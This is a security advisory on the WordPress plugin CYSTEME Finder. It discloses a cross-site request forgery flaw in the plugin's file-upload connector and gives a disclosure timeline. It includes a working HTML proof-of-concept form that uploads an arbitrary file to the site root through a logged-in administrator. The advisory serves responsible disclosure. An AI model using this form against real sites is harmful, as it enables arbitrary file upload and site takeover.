Certain types of plugins are inherently more of a security concern because their intended functionality involves actions that hackers frequently attempt to exploit, so if something is wrong with their security it is likely the plugin will be exploited. That doesn’t mean that people developing them are going to be very careful in coding them or that the public using them is going to do any checking, as can be seen with the plugin CYSTEME Finder. The plugin, which has 7,000+ active installs according to wordpress.org, provides a file manger in WordPress, which allows uploading files and viewing the content of files. We see vulnerabilities in those two types of functionality frequently targeted by hackers, with vulnerabilities in upload functionality much more likely to successfully exploited and leading to a website being hacked.
Recently someone under the handle T0w3ntum looked at the plugin and found that it contained arbitrary file upload and arbitrary file viewing vulnerabilities, as of version 1.3. The vulnerabilities existed due to the plugin not making properly restricting access to the upload and file viewing functionality. In looking over the changes made to fix those in version 1.4, we were troubled by the odd choice of security code and found an additional vulnerability. In the changelog entry for 1.4 sates that the was a security fix involving “use of PHP session rather than REQUEST vars”. That didn’t sound like the type of change we would expect to fix this type of vulnerability in a WordPress plugin. Looking at the changes made it didn’t change our view. Instead of checking that requests to the plugin are made by someone who should be able to, by using WordPress functions, they are checking a PHP session. While it looks to have fix the vulnerabilities, not using the WordPress functionality specifically designed for this, would make of us wary of using such a plugin.
In looking over that we noticed that there they were missing protection against cross-site request forgery (CSRF). So if you could get a logged in administrator to access a page you control you could cause them to upload an arbitrary file.
Requests to upload a file are handle through the file /php/connector.php. That file doesn’t perform any nonce checks before sending the request to the function run() in the file /php/elFinderConnector.class.php. From there the request is sent to the function upload() in the file /php/elFinder.class.php, which doesn’t check for a valid nonce before saving the uploaded file to the filesystem.
We notified the developer a week ago but have not heard back from them and the vulnerability has not been fixed.
Proof of Concept
The following proof of concept will cause the chosen file to be uploaded to root directory on the website, when logged in as an Administrator. Before that the page /wp-admin/options-general.php?page=cysteme_finder needs to be visited to create a new PHP session.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/&wpurl=http://example.com" method="POST" enctype="multipart/form-data"> <input type="hidden" name="cmd" value="upload"> <input type="hidden" name="target" value="l1_Lw"> <input type="file" name="upload"> <input type="submit" value="Submit" /> </form> </body> </html>
- 9/7/2016 – Developer notified.
- 9/14/2016 – WordPress.org Plugin Directory notified.
- 9/15/2016 – Removed from WordPress.org Plugin Directory.
- 10/3/2016 – Version of 1.5 that resolves issue submitted to Plugin Directory repository.